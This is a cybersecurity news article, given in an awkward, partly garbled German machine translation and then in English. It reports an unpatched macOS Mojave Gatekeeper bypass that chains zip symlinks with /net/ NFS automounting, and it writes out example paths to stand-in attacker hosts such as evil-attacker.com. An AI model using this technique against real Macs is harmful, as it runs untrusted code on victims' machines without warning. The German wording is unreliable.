Ungepatchte MacOS X Gatekeeper Bypass führt zu der Ausführung beliebigen Codes
CYBER NEWS

Ungepatchte MacOS X Gatekeeper Bypass führt zu der Ausführung beliebigen Codes

1 Star2 Stars3 Stars4 Stars5 Stars (Noch keine Bewertungen)
Loading ...

Eine ungepatchte Schwachstelle in macOS 10.14.5 auch bekannt als Mojave wurde vor kurzem entdeckt. Der Fehler kann ein Angreifer ohne die Notwendigkeit der Interaktion mit dem Benutzer beliebigen Code auszuführen, also unter Umgehung Torwächter.

Diese Entdeckung stammt aus Forschern Filippo Cavallarin aus Segment, eine in Italien ansässige Firma Cyber. "Auf MacOS X-Version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,“Die Forscher schrieben.




Wie ist der Torwächter Bypass möglich?

Erste, es sei darauf hingewiesen, dass es in Torwächter Design ist sowohl externe Laufwerke und Netzwerkfreigaben als sichere Ort zu akzeptieren, so dass Anwendungen, die sie enthalten, einwandfrei laufen. Jedoch, indem sie zusammen zwei legitime Eigenschaften macOS, es ist möglich, die Torwächter und sein „zu täuschenbeabsichtigtes Verhalten".

So, was sind diese Funktionen? Die erste erlaubt es einem Benutzer, automatisch eine Netzwerkfreigabe bereitstellen, indem Sie einfach einen Pfad beginnend mit der Annahme „/ net /“:

Beispielsweise
ls /net/evil-attacker.com/sharedfolder/
machen das Betriebssystem den Inhalt des ‚shared lesen’ auf der Remote-Host (evil-attacker.com) mit NFS.

Die andere Funktion ist über zip-Archive enthalten symbolische Links, die zu beliebigen Orten zeigen. Weiter, die Software, die Zip-Dateien auf macOS dekomprimiert führt keine Überprüfungen der Symlinks vor ihnen zu schaffen, Der Forscher erklärt.

Wie würde ein Arbeits Angriff? Ein Angreifer kann mit einem symbolischen Link zu einem auto Hacker gesteuerte Endpunkt eine Zip-Datei Handwerk (ex Documents -> /net/evil.com/Documents) und könnte es zu einem gezielten System senden. Der Benutzer laden Sie das bösartige Archiv, und würde die bösartige Datei extrahieren, ohne etwas zu ahnen,.

Jetzt ist das Opfer in einem vom Angreifer kontrolliert, aber vertrauen durch Torwächter, so dass jeder Angreifer kontrollierte ausführbare Datei kann ohne Warnung ausgeführt werden. Die Art und Weise Finder ist so konzipiert, (ex verstecken .app Erweiterungen, verstecken vollständigen Pfad von titlebar) macht diesen tecnique sehr effektiv und schwer zu erkennen, die Forscher festgestellt,.

Es gibt auch ein Video-Demonstration wie diese Bypass-Werke Torwächter.

verbunden: Windows-EXE-Datei Bypässe Torwächter und Downloads Malware auf Macs

Dies ist nicht der erste Fall von macOS build-in Schutz a.k.a. Torwächter wird umgangen. Im Februar dieses Jahres, Trend Micro Sicherheitsexperten entdeckt, dass eine böswillige Windows-EXE-Datei Mac-Computer infizieren könnte, und könnte infostealer Malware von Adware auf ihren Systemen begleitet herunterladen.

In diesem Fall, die EXE-Dateien konnten Torwächter Schutz entziehen, weil sie nicht von der Software überprüft wurden, entworfen nur native Mac-Dateien zu überprüfen. Dies könnte dazu führen, die Code Signaturprüfung zu umgehen und Verifikation.

Avatar

Milena Dimitrova

Ein inspirierter Schriftsteller und Content-Manager, der mit SensorsTechForum ist seit 4 Jahre. Genießt ‚Mr. Robot‘und Ängste‚1984‘. Konzentriert sich auf die Privatsphäre der Nutzer und Malware-Entwicklung, sie die feste Überzeugung, in einer Welt, in der Cybersicherheit eine zentrale Rolle spielt. Wenn der gesunde Menschenverstand macht keinen Sinn, sie wird es sich Notizen zu machen. Diese Noten drehen können später in Artikel! Folgen Sie Milena @Milenyim

Mehr Beiträge

Folge mir:
Zwitschern

Schreibe einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

Frist ist erschöpft. Bitte laden CAPTCHA.

Auf Facebook teilen Teilen
Loading ...
Empfehlen über Twitter Tweet
Loading ...
Share on Google Plus Teilen
Loading ...
Share on Linkedin Teilen
Loading ...
Empfehlen über Digg Teilen
Teilen auf Reddit Teilen
Loading ...
Empfehlen über Stumbleupon Teilen
Loading ...

Unpatched MacOS X GateKeeper Bypass Leads to Arbitrary Code Execution
CYBER NEWS

Unpatched MacOS X GateKeeper Bypass Leads to Arbitrary Code Execution

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...

An unpatched vulnerability in macOS 10.14.5 also known as Mojave was recently discovered. The flaw could allow an attacker to execute arbitrary code without the need of user interaction, thus bypassing Gatekeeper.

This discovery comes from researcher Filippo Cavallarin from Segment, an Italy-based cybersecurity company. “On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,” the researcher wrote.




How is the Gatekeeper bypass possible?

First, it should be noted that it’s in Gatekeeper’s design to accept both external drives and network shares as safe location, allowing apps that they contain to run flawlessly. However, by putting together two legitimate features of macOS, it is possible to deceive the Gatekeeper and its “intended behavior”.

So, what are these features? The first one allows a user to automatically mount a network share by simply accepting a path beginning with “/net/”:

For example
ls /net/evil-attacker.com/sharedfolder/
will make the os read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.

The other feature is about zip archives containing symbolic links that point to arbitrary locations. Furthermore, the software that decompresses zip files on macOS doesn’t perform checks on the symlinks prior to creating them, the researcher explained.

How would an attack work? An attacker could craft a zip file with a symbolic link to an automount hacker-controlled endpoint (ex Documents -> /net/evil.com/Documents) and could send it to a targeted system. The user would download the malicious archive, and would extract the malicious file without suspecting anything.

Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot, the researcher noted.

There’s also a video demonstration of how this Gatekeeper bypass works.

Related: Windows .exe File Bypasses Gatekeeper and Downloads Malware on Macs

This is not the first case of macOS build-in protection a.k.a. Gatekeeper being bypassed. In February this year, Trend Micro security researchers discovered that a malicious Windows .exe file could infect Mac computers, and could download infostealer malware accompanied by adware on their systems.

In that case, the .exe files were able to evade Gatekeeper’s protection because they were not checked by the software, designed to check only native Mac files. This could lead to bypassing the code signature check and verification.

Avatar

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys ‘Mr. Robot’ and fears ‘1984’. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles!

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...